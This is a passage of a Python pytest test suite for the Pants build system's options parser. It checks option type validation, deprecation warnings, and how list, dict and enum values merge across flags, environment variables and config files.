with pytest.raises(BooleanConversionError):
create_options([GLOBAL_SCOPE], register, config={"GLOBAL": {"opt": val}}).for_global_scope()
# ----------------------------------------------------------------------------------------
# Type checks
# ----------------------------------------------------------------------------------------
@contextmanager
def no_exception():
"""use in tests as placeholder for a pytest.raises, when no exception is expected."""
yield None
@pytest.mark.parametrize(
"option_kwargs, assert_expected",
[
(
dict(type=str, default=""),
no_exception(),
),
(
dict(type=str, default=42),
pytest.raises(
DefaultValueType, match=r"Default value int\(42\) does not match option type str\."
),
),
(
dict(type=bool, default="True"),
no_exception(),
),
(
dict(type=bool, default=True),
no_exception(),
),
(
dict(type=bool, default="not a bool"),
pytest.raises(
BooleanConversionError, match=r'Got "not a bool"\. Expected "True" or "False"\.'
),
),
(
dict(type=int, default=1.0),
pytest.raises(
DefaultValueType,
match=r"Default value float\(1\.0\) does not match option type int\. \[option --opt in global scope\]\.",
),
),
(
dict(type=list, member_type=int, default="[1, 2, 3]"),
no_exception(),
),
(
dict(type=list, member_type=int, default="[1, 2.1, 3]"),
pytest.raises(
DefaultValueType,
match=r"Default member value type mismatch\.\n\n Member value float\(2\.1\) does not match list option type int\.",
),
),
(
dict(type=list, member_type=float, default="[1.1, 2.0, 3.3]"),
no_exception(),
),
(
dict(type=list, member_type=float, default="[1.1, 2.2, '3.3']"),
pytest.raises(
DefaultValueType,
match=r"Member value str\('3\.3'\) does not match list option type float\.",
),
),
(
dict(type=dict, default="{'foo': 'bar'}"),
no_exception(),
),
(
dict(type=dict, default="['foo', 'bar']"),
pytest.raises(ParseError, match=r"Invalid dict value: \['foo', 'bar'\]"),
),
],
)
def test_default_value_type_assert(option_kwargs, assert_expected):
def register(opts: Options) -> None:
opts.register(GLOBAL_SCOPE, "--opt", **option_kwargs)
with assert_expected:
create_options([GLOBAL_SCOPE], register).for_scope(GLOBAL_SCOPE)
# ----------------------------------------------------------------------------------------
# Deprecations.
# ----------------------------------------------------------------------------------------
def test_deprecated_options(caplog) -> None:
def register(opts: Options) -> None:
opts.register(
GLOBAL_SCOPE, "--old1", removal_version="999.99.9.dev0", removal_hint="Stop it."
)
opts.register(
GLOBAL_SCOPE,
"--bool1",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="¡Basta!",
)
opts.register("scope", "--valid")
opts.register(
"scope", "--old2", removal_version="999.99.9.dev0", removal_hint="Stop with the scope."
)
opts.register(
"scope",
"--bool2",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="¡Basta but scoped!",
)
def assert_deprecated(
scope: str,
opt: str,
args: list[str],
*,
expected: str | bool,
env: dict[str, str] | None = None,
config: dict[str, dict[str, str]] | None = None,
) -> None:
caplog.clear()
warn_or_error.clear() # type: ignore[attr-defined]
opts = create_options([GLOBAL_SCOPE, "scope"], register, args, env=env, config=config)
assert opts.for_scope(scope)[opt] == expected
assert len(caplog.records) == 1
assert "is scheduled to be removed in version" in caplog.text
assert opt in caplog.text
assert_deprecated(GLOBAL_SCOPE, "old1", ["--old1=x"], expected="x")
assert_deprecated(GLOBAL_SCOPE, "bool1", ["--bool1"], expected=True)
assert_deprecated(GLOBAL_SCOPE, "bool1", ["--no-bool1"], expected=False)
assert_deprecated("scope", "old2", ["scope", "--old2=x"], expected="x")
assert_deprecated("scope", "old2", ["--scope-old2=x"], expected="x")
assert_deprecated("scope", "bool2", ["scope", "--bool2"], expected=True)
assert_deprecated("scope", "bool2", ["scope", "--no-bool2"], expected=False)
assert_deprecated("scope", "bool2", ["--scope-bool2"], expected=True)
assert_deprecated("scope", "bool2", ["--no-scope-bool2"], expected=False)
assert_deprecated(GLOBAL_SCOPE, "old1", [], env={"PANTS_GLOBAL_OLD1": "x"}, expected="x")
assert_deprecated("scope", "old2", [], env={"PANTS_SCOPE_OLD2": "x"}, expected="x")
assert_deprecated(GLOBAL_SCOPE, "old1", [], config={"GLOBAL": {"old1": "x"}}, expected="x")
assert_deprecated("scope", "old2", [], config={"scope": {"old2": "x"}}, expected="x")
# Make sure the warnings don't come out for regular options.
caplog.clear()
warn_or_error.clear() # type: ignore[attr-defined]
assert (
create_options([GLOBAL_SCOPE, "scope"], register, ["--scope-valid=x"])
.for_scope("scope")
.valid
== "x"
)
assert not caplog.records
def test_deprecated_options_error() -> None:
def register(opts: Options) -> None:
opts.register(GLOBAL_SCOPE, "--expired", removal_version="0.0.1.dev0")
with pytest.raises(CodeRemovedError):
create_options([GLOBAL_SCOPE], register, [])
@unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
def test_deprecated_options_start_version(caplog) -> None:
def register(opts: Options) -> None:
opts.register(
GLOBAL_SCOPE,
"--delayed",
removal_version="999.99.9.dev0",
deprecation_start_version="500.0.0.dev0",
)
opts.register(
GLOBAL_SCOPE,
"--past-start",
removal_version="999.99.9.dev0",
deprecation_start_version=_FAKE_CUR_VERSION,
)
caplog.clear()
assert (
create_options([GLOBAL_SCOPE], register, ["--delayed=x"]).for_global_scope().delayed == "x"
)
assert not caplog.records
assert (
create_options([GLOBAL_SCOPE], register, ["--past-start=x"]).for_global_scope().past_start
== "x"
)
assert len(caplog.records) == 1
assert "is scheduled to be removed in version" in caplog.text
assert "past_start" in caplog.text
def test_scope_deprecation(caplog) -> None:
# This test demonstrates that two different new scopes can deprecate the same
# old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
class Subsystem1(Subsystem):
options_scope = "new1"
deprecated_options_scope = "deprecated"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
foo = StrOption(default=None, help="")
bar = StrOption(default=None, help="")
baz = StrOption(default=None, help="")
class Subsystem2(Subsystem):
options_scope = "new2"
deprecated_options_scope = "deprecated"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
qux = StrOption(default=None, help="")
def register(opts: Options) -> None:
opts.register(Subsystem1.options_scope, "--foo")
opts.register(Subsystem1.options_scope, "--bar")
opts.register(Subsystem1.options_scope, "--baz")
opts.register(Subsystem2.options_scope, "--qux")
opts = create_options(
[GLOBAL_SCOPE],
register,
["--new1-baz=vv"],
extra_scope_infos=[Subsystem1.get_scope_info(), Subsystem2.get_scope_info()],
config={
Subsystem1.options_scope: {"foo": "xx"},
Subsystem1.deprecated_options_scope: {
"foo": "yy",
"bar": "zz",
"baz": "ww",
"qux": "uu",
},
},
)
caplog.clear()
vals1 = opts.for_scope(Subsystem1.options_scope)
assert len(caplog.records) == 1
assert Subsystem1.deprecated_options_scope in caplog.text
assert "foo" in caplog.text
# Deprecated scope takes precedence at equal rank, but new scope takes precedence at higher
# rank.
assert vals1.foo == "yy"
assert vals1.bar == "zz"
assert vals1.baz == "vv"
caplog.clear()
vals2 = opts.for_scope(Subsystem2.options_scope)
assert len(caplog.records) == 1
assert Subsystem1.deprecated_options_scope in caplog.text
assert "qux" in caplog.text
assert vals2.qux == "uu"
def test_scope_deprecation_default_config_section(caplog) -> None:
# Confirms that a DEFAULT option does not trigger deprecation warnings for a deprecated scope.
class Subsystem1(Subsystem):
options_scope = "new"
deprecated_options_scope = "deprecated"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
def register(opts: Options) -> None:
opts.register(Subsystem1.options_scope, "--foo")
opts = create_options(
[GLOBAL_SCOPE],
register,
[],
extra_scope_infos=[Subsystem1.get_scope_info()],
config={"DEFAULT": {"foo": "aa"}, Subsystem1.options_scope: {"foo": "xx"}},
)
caplog.clear()
assert opts.for_scope(Subsystem1.options_scope).foo == "xx"
assert not caplog.records
# ----------------------------------------------------------------------------------------
# Legacy Unittest TestCase.
# ----------------------------------------------------------------------------------------
class OptionsTest(unittest.TestCase):
@staticmethod
def _create_config(
config: dict[str, dict[str, str]] | None = None,
config2: dict[str, dict[str, str]] | None = None,
) -> Config:
return Config.load(
[
FileContent("test_config.toml", toml.dumps(config or {}).encode()),
FileContent("test_config2.toml", toml.dumps(config2 or {}).encode()),
]
)
def _parse(
self,
*,
flags: str = "",
env: dict[str, str] | None = None,
config: dict[str, dict[str, Any]] | None = None,
config2: dict[str, dict[str, Any]] | None = None,
bootstrap_option_values=None,
) -> Options:
args = ["./pants", *shlex.split(flags)]
options = Options.create(
env=env or {},
config=self._create_config(config, config2),
known_scope_infos=OptionsTest._known_scope_infos,
args=args,
bootstrap_option_values=bootstrap_option_values,
)
self._register(options)
return options
_known_scope_infos = [
ScopeInfo(scope)
for scope in (
GLOBAL_SCOPE,
"anotherscope",
"compile",
"compile.java",
"stale",
"test",
"test.junit",
"passconsumer",
"simple",
"simple-dashed",
"scoped.a.bit",
"scoped.and-dashed",
"fromfile",
"fingerprinting",
"enum-opt",
"separate-enum-opt-scope",
"other-enum-scope",
)
]
class SomeEnumOption(Enum):
a_value = "a-value"
another_value = "another-value"
yet_another = "yet-another"
one_more = "one-more"
def _register(self, options):
def register_global(*args, **kwargs):
options.register(GLOBAL_SCOPE, *args, **kwargs)
register_global("--verbose", type=bool, help="Verbose output.")
register_global("--num", type=int, default=99)
# NB: `-l` on the global scope is the only short arg we allow. We need to make sure it
# works.
register_global("-l", "--level", type=str, help="What level to use.")
# Test that we can use the same name on the global scope and another scope.
options.register("anotherscope", "--num", type=int, default=99)
register_global("--y", type=list, member_type=int)
register_global(
"--v2", help="Two-letter long-form option, used to test option name suggestions."
)
register_global("--config-override", type=list)
register_global("--pants-foo")
register_global("--bar-baz")
register_global("--store-true-flag", type=bool)
# Choices.
register_global("--str-choices", choices=["foo", "bar"])
register_global("--int-choices", choices=[42, 99], type=list, member_type=int)
# Custom types.
register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
register_global("--dicty", type=dict, default='{"a": "b"}')
register_global(
"--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
)
register_global("--targety", type=target_option, default="//:a")
register_global(
"--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
)
register_global("--filey", type=file_option, default=None)
register_global("--file-listy", type=list, member_type=file_option)
register_global(
"--shell-str-listy",
type=list,
member_type=shell_str,
default="--default1 --default2=test",
)
# Implicit value.
register_global("--implicit-valuey", default="default", implicit_value="implicit")
# Mutual Exclusive options
register_global("--mutex-foo", mutually_exclusive_group="mutex")
register_global("--mutex-bar", mutually_exclusive_group="mutex")
register_global("--mutex-baz", mutually_exclusive_group="mutex")
register_global("--new-name")
register_global("--old-name", mutually_exclusive_group="new_name")
# Test mutual exclusive options with a scope
options.register("stale", "--mutex-a", mutually_exclusive_group="scope_mutex")
options.register("stale", "--mutex-b", mutually_exclusive_group="scope_mutex")
options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
options.register("stale", "--crufty-new")
# For scoped fingerprintable test
options.register("compile", "--modifycompile")
options.register("compile", "--modifylogs", fingerprint=False)
options.register(
"compile",
"--modifypassthrough",
passthrough=True,
type=list,
member_type=str,
)
# For scoped env vars test
options.register("simple", "--spam")
options.register("simple-dashed", "--spam")
options.register("scoped.a.bit", "--spam")
options.register("scoped.and-dashed", "--spam")
# For fromfile test
options.register("fromfile", "--string")
options.register("fromfile", "--intvalue", type=int)
options.register("fromfile", "--dictvalue", type=dict)
options.register("fromfile", "--listvalue", type=list)
options.register("fromfile", "--passthru-listvalue", type=list, passthrough=True)
options.register("fromfile", "--appendvalue", type=list, member_type=int)
# For fingerprint tests
register_global("--implicitly-fingerprinted")
register_global("--explicitly-fingerprinted", fingerprint=True)
register_global("--explicitly-not-fingerprinted", fingerprint=False)
register_global("--implicitly-not-daemoned")
register_global("--explicitly-not-daemoned", daemon=False)
register_global("--explicitly-daemoned", daemon=True)
# For enum tests
options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
options.register(
"other-enum-scope", "--some-list-enum", type=list, member_type=self.SomeEnumOption
)
options.register(
"other-enum-scope",
"--some-list-enum-with-default",
type=list,
member_type=self.SomeEnumOption,
default=[self.SomeEnumOption.yet_another],
)
# For testing the default value
options.register(
"separate-enum-opt-scope",
"--some-enum-with-default",
default=self.SomeEnumOption.a_value,
type=self.SomeEnumOption,
)
def test_env_var_of_type_int(self) -> None:
create_options_object = partial(
Options.create,
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options = create_options_object(env={"PANTS_FOO_BAR": "123"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
assert 123 == options.for_global_scope().foo_bar
options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
assert [123, 456] == options.for_global_scope().foo_bar
def test_arg_scoping(self) -> None:
# Some basic smoke tests.
options = self._parse(flags="--verbose")
assert options.for_global_scope().verbose is True
options = self._parse(flags="--verbose compile path/to/tgt")
assert ["path/to/tgt"] == options.specs
assert options.for_global_scope().verbose is True
options = self._parse(flags="-linfo")
assert options.for_global_scope().level == "info"
options = self._parse(flags="--level=info compile path/to/tgt")
assert ["path/to/tgt"] == options.specs
assert options.for_global_scope().level == "info"
with pytest.raises(ParseError):
self._parse(flags="--unregistered-option compile").for_global_scope()
# Scoping of different values of options with the same name in different scopes.
options = self._parse(flags="--num=11 anotherscope --num=22")
assert 11 == options.for_global_scope().num
assert 22 == options.for_scope("anotherscope").num
# Test list-typed option.
global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
assert [88, -99] == global_options.y
global_options = self._parse(
flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
).for_global_scope()
assert [88, -99, 5, -6, 77] == global_options.y
global_options = self._parse().for_global_scope()
assert [] == global_options.y
global_options = self._parse(
env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
).for_global_scope()
assert ["123", "456"] == global_options.config_override
global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
assert [""] == global_options.config_override
global_options = self._parse(
flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
).for_global_scope()
assert [1, 2] == global_options.listy
# Test dict-typed option.
global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
assert {"c": "d"} == global_options.dicty
# Test list-of-dict-typed option.
global_options = self._parse(
flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
).for_global_scope()
assert [{"c": "d"}, {"e": "f"}] == global_options.dict_listy
# Test target-typed option.
global_options = self._parse().for_global_scope()
assert "//:a" == global_options.targety
global_options = self._parse(flags="--targety=//:foo").for_global_scope()
assert "//:foo" == global_options.targety
# Test list-of-target-typed option.
global_options = self._parse(
flags='--target-listy=\'["//:foo", "//:bar"]\''
).for_global_scope()
assert ["//:foo", "//:bar"] == global_options.target_listy
# Test file-typed option.
with temporary_file_path() as fp:
global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
assert fp == global_options.filey
# Test list-of-file-typed option.
with temporary_file_path() as fp1:
with temporary_file_path() as fp2:
global_options = self._parse(
flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
).for_global_scope()
assert [fp1, fp2] == global_options.file_listy
def test_list_option(self) -> None:
def check(
*,
expected: list[int],
flags: str = "",
env_val: str | None = None,
config_val: str | None = None,
config2_val: str | None = None,
) -> None:
env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"listy": config_val}} if config_val else None
config2 = {"GLOBAL": {"listy": config2_val}} if config2_val else None
global_options = self._parse(
flags=flags, env=env, config=config, config2=config2
).for_global_scope()
assert global_options.listy == expected
default = [1, 2, 3]
check(expected=default)
# Appending to the default.
check(flags="--listy=4", expected=[*default, 4])
check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
# Filtering from the default.
check(flags="--listy=-[2]", expected=[1, 3])
# Replacing the default.
check(flags="--listy=[4,5]", expected=[4, 5])
# Appending across env, config and flags (in the right order).
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="+[4,5],+[45]",
expected=[*default, 4, 5, 45, 6, 7, 8, 9],
)
check(
config_val="+[4,5],-[4]",
expected=[*default, 5],
)
# Appending and filtering across env, config and flags (in the right order).
check(
flags="--listy=-[1,5,6]",
env_val="+[6,7]",
config_val="+[4,5]",
config2_val="+[99]",
expected=[2, 3, 4, 99, 7],
)
check(
flags="--listy=+[8,9]",
env_val="-[4,5]",
config_val="+[4,5],-[3]",
expected=[1, 2, 8, 9],
)
# Appending a value from a fromfile.
with temporary_file(binary_mode=False) as fp:
fp.write("-[3]")
fp.close()
check(
flags="--listy=+[8,9]",
env_val="-[4,5]",
config_val="+[4,5]",
config2_val=f"@{fp.name}",
expected=[1, 2, 8, 9],
)
# Overwriting from env, then appending and filtering.
check(
flags="--listy=+[8,9],-[6]",
env_val="[6,7]",
config_val="+[4,5]",
expected=[7, 8, 9],
)
# Overwriting from config, then appending.
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="[4,5]",
config2_val="-[4]",
expected=[5, 6, 7, 8, 9],
)
# Overwriting from flags.
check(
flags="--listy=[8,9]",
env_val="+[6,7]",
config_val="+[4,5],-[8]",
expected=[8, 9],
)
# Filtering all instances of repeated values.
check(
flags="--listy=-[5]",
config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
expected=[1, 2, 3, 4, 6],
)
# Filtering a value even though it was appended again at a higher rank.
check(
flags="--listy=+[4]",
env_val="-[4]",
config_val="+[4,5]",
expected=[*default, 5],
)
# Filtering a value even though it was appended again at the same rank.
check(
env_val="-[4],+[4]",
config_val="+[4,5]",
expected=[*default, 5],
)
# Overwriting cancels filters.
check(env_val="[4]", config_val="-[4]", expected=[4])
def test_dict_list_option(self) -> None:
def check(
*,
expected: list[dict[str, int]],
flags: str = "",
env_val: str | None = None,
config_val: str | None = None,
) -> None:
env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.dict_listy == expected
default = [{"a": 1, "b": 2}, {"c": 3}]
one_element_appended = [*default, {"d": 4, "e": 5}]
two_elements_appended = [*one_element_appended, {"f": 6}]
replaced = [{"d": 4, "e": 5}, {"f": 6}]
check(expected=default)
check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
check(
flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
expected=two_elements_appended,
)
check(
flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'',
expected=two_elements_appended,
)
check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
def test_target_list_option(self) -> None:
def check(
*,
expected: list[str],
flags: str = "",
env_val: str | None = None,
config_val: str | None = None,
) -> None:
env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.target_listy == expected
default = ["//:a", "//:b"]
specified_args = ["//:c", "//:d"]
all_args = [*default, *specified_args]
check(expected=default)
check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
check(env_val="//:c", expected=[*default, "//:c"])
check(env_val='+["//:c", "//:d"]', expected=all_args)
check(env_val='["//:c", "//:d"]', expected=specified_args)
check(config_val="//:c", expected=[*default, "//:c"])
check(config_val='+["//:c", "//:d"]', expected=all_args)
check(config_val='["//:c", "//:d"]', expected=specified_args)
def test_shell_str_list(self) -> None:
def check(
*,
expected: list[str],
flags: str = "",
env_val: str | None = None,
config_val: str | None = None,
) -> None:
env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.shell_str_listy == expected
default = ["--default1", "--default2=test"]
specified_args = ["arg1", "arg2=foo", "--arg3"]
all_args = [*default, *specified_args]
check(expected=default)
check(
flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
)
check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
check(env_val="arg1 arg2=foo --arg3", expected=all_args)
check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
check(config_val="arg1 arg2=foo --arg3", expected=all_args)
check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
def test_dict_option(self) -> None:
def check(
*,
expected: dict[str, str],
flags: str = "",
config_val: str | None = None,
config2_val: str | None = None,
) -> None:
config = {"GLOBAL": {"dicty": config_val}} if config_val else None
config2 = {"GLOBAL": {"dicty": config2_val}} if config2_val else None
global_options = self._parse(
flags=flags, config=config, config2=config2
).for_global_scope()
assert global_options.dicty == expected
default = {"a": "b"}
specified_args = {"c": "d"}
all_args = {**default, **specified_args}
check(expected=default)
check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
check(config_val='{"c": "d"}', expected=specified_args)
check(config_val='+{"c": "d"}', expected=all_args)
check(
config_val='+{"c": "d"}',
config2_val='+{"e": "f"}',
flags='--dicty=\'+{"g": "h"}\'',
expected={**all_args, "e": "f", "g": "h"},
)
check(
config_val='+{"c": "d"}',
flags='--dicty=\'+{"e": "f"}\'',
expected={**all_args, "e": "f"},
)
# Check that highest rank wins if we have multiple values for the same key.
check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
check(
config_val='+{"a": "b+", "c": "d"}',
flags='--dicty=\'+{"a": "b++"}\'',
expected={"a": "b++", "c": "d"},
)
def test_defaults(self) -> None:
# Hard-coded defaults.
options = self._parse(flags="anotherscope")
assert 99 == options.for_global_scope().num
assert 99 == options.for_scope("anotherscope").num
# Get defaults from config and environment.
config = {"DEFAULT": {"num": "88"}, "anotherscope": {"num": "77"}}
options = self._parse(flags="anotherscope", config=config)
assert 88 == options.for_global_scope().num
assert 77 == options.for_scope("anotherscope").num
env = {"PANTS_ANOTHERSCOPE_NUM": "55"}
options = self._parse(flags="anotherscope", env=env, config=config)
assert 88 == options.for_global_scope().num
assert 55 == options.for_scope("anotherscope").num
def test_choices(self) -> None:
options = self._parse(flags="--str-choices=foo")
assert "foo" == options.for_global_scope().str_choices
options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
assert "bar" == options.for_global_scope().str_choices
with pytest.raises(ParseError):
options = self._parse(flags="--str-choices=baz")
options.for_global_scope()
with pytest.raises(ParseError):
options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
options.for_global_scope()
options = self._parse(flags="--int-choices=42 --int-choices=99")
assert [42, 99] == options.for_global_scope().int_choices
def test_parse_dest(self) -> None:
assert "thing" == Parser.parse_dest("--thing")
assert "other_thing" == Parser.parse_dest("--thing", dest="other_thing")
def test_validation(self) -> None:
def assertError(expected_error, *args, **kwargs):
with pytest.raises(expected_error):
options = Options.create(
args=["./pants"],
env={},
config=self._create_config(),
known_scope_infos=[global_scope()],
)
options.register(GLOBAL_SCOPE, *args, **kwargs)
options.for_global_scope()
assertError(NoOptionNames)
assertError(OptionNameDoubleDash, "badname")
assertError(OptionNameDoubleDash, "-badname")
assertError(InvalidKwarg, "--foo", badkwarg=42)
assertError(ImplicitValIsNone, "--foo", implicit_value=None)
assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
assertError(MemberTypeNotAllowed, "--foo", member_type=int)
assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
assertError(InvalidMemberType, "--foo", type=list, member_type=set)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
assertError(HelpType, "--foo", help=())
assertError(HelpType, "--foo", help=("Help!",))
def test_implicit_value(self) -> None:
def check(*, flag: str = "", expected: str) -> None:
options = self._parse(flags=flag)
assert options.for_global_scope().implicit_valuey == expected
check(expected="default")
check(flag="--implicit-valuey", expected="implicit")
check(flag="--implicit-valuey=explicit", expected="explicit")
def test_shadowing(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
args=["./pants"],
)
options.register("", "--opt1")
options.register("foo", "-o", "--opt2")
def test_is_known_scope(self) -> None:
options = self._parse()
for scope_info in self._known_scope_infos:
assert options.is_known_scope(scope_info.scope)
assert not options.is_known_scope("nonexistent_scope")
def test_file_spec_args(self) -> None:
with temporary_file(binary_mode=False) as tmp:
tmp.write(
dedent(
"""
foo
bar
"""
)
)
tmp.flush()
# Note that we prevent loading a real pants.toml during get_bootstrap_options().
flags = f'--spec-files={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
bootstrapper = OptionsBootstrapper.create(
env={}, args=shlex.split(f"./pants {flags}"), allow_pantsrc=False
)
bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
sorted_specs = sorted(options.specs)
assert ["bar", "fleem:tgt", "foo", "morx:tgt"] == sorted_specs
def test_passthru_args_subsystems_and_goals(self):
# Test that passthrough args are applied.
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
args=["./pants", "test", "target", "--", "bar", "--baz", "@dont_fromfile_expand_me"],
)
options.register(
"passconsumer", "--passthing", passthrough=True, type=list, member_type=str
)
assert ["bar", "--baz", "@dont_fromfile_expand_me"] == options.for_scope(
"passconsumer"
).passthing
def test_at_most_one_goal_with_passthru_args(self):
with pytest.raises(Options.AmbiguousPassthroughError) as exc:
Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), task("fmt")],
args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
)
assert (
"Specifying multiple goals (in this case: ['test', 'fmt']) along with passthrough args"
+ " (args after `--`) is ambiguous."
) in str(exc.value)
def test_passthru_args_not_interpreted(self):
# Test that passthrough args are not interpreted.
options = Options.create(
env={},
config=self._create_config(
{"consumer": {"shlexed": ["from config"], "string": ["from config"]}}
),
known_scope_infos=[global_scope(), task("test"), subsystem("consumer")],
args=[
"./pants",
"--consumer-shlexed=a",
"--consumer-string=b",
"test",
"--",
"[bar]",
"multi token from passthrough",
],
)
options.register(
"consumer", "--shlexed", passthrough=True, type=list, member_type=shell_str
)
options.register("consumer", "--string", passthrough=True, type=list, member_type=str)
assert [
"from",
"config",
"a",
"[bar]",
"multi token from passthrough",
] == options.for_scope("consumer").shlexed
assert ["from config", "b", "[bar]", "multi token from passthrough"] == options.for_scope(
"consumer"
).string
def test_global_scope_env_vars(self):
def check_pants_foo(expected_val, env):
val = self._parse(env=env).for_global_scope().pants_foo
assert expected_val == val
check_pants_foo(
"AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
)
check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
check_pants_foo(None, {})
# Check that an empty string is distinct from no value being specified.
check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})
# A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.
def check_bar_baz(expected_val, env):
val = self._parse(env=env).for_global_scope().bar_baz
assert expected_val == val
check_bar_baz(
"AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
)
check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
check_bar_baz(None, {"BAR_BAZ": "CCC"})
check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
def check_scoped_spam(scope, expected_val, env):
val = self._parse(env=env).for_scope(scope).spam
assert expected_val == val
check_scoped_spam("simple", "value", {"PANTS_SIMPLE_SPAM": "value"})
check_scoped_spam("simple-dashed", "value", {"PANTS_SIMPLE_DASHED_SPAM": "value"})
check_scoped_spam("scoped.a.bit", "value", {"PANTS_SCOPED_A_BIT_SPAM": "value"})
check_scoped_spam("scoped.and-dashed", "value", {"PANTS_SCOPED_AND_DASHED_SPAM": "value"})
def test_enum_option_type_parse_error(self) -> None:
with pytest.raises(ParseError) as exc:
options = self._parse(flags="enum-opt --some-enum=invalid-value")
options.for_scope("enum-opt")
assert (
"Invalid choice 'invalid-value'."
+ " Choose from: a-value, another-value, yet-another, one-more"
) in str(exc.value)
def test_non_enum_option_type_parse_error(self) -> None:
with pytest.raises(ParseError) as exc:
options = self._parse(flags="--num=not-a-number")
options.for_global_scope()
assert (
"Error applying type 'int' to option value 'not-a-number': invalid literal for int()"
) in str(exc.value)
def test_mutually_exclusive_options(self) -> None:
"""Ensure error is raised when mutual exclusive options are given together."""
def assert_mutually_exclusive_raised(
*,
flags: str,
scope: str | None = None,
env: dict[str, str] | None = None,
config: dict[str, dict[str, str]] | None = None,
) -> None:
with pytest.raises(MutuallyExclusiveOptionError):
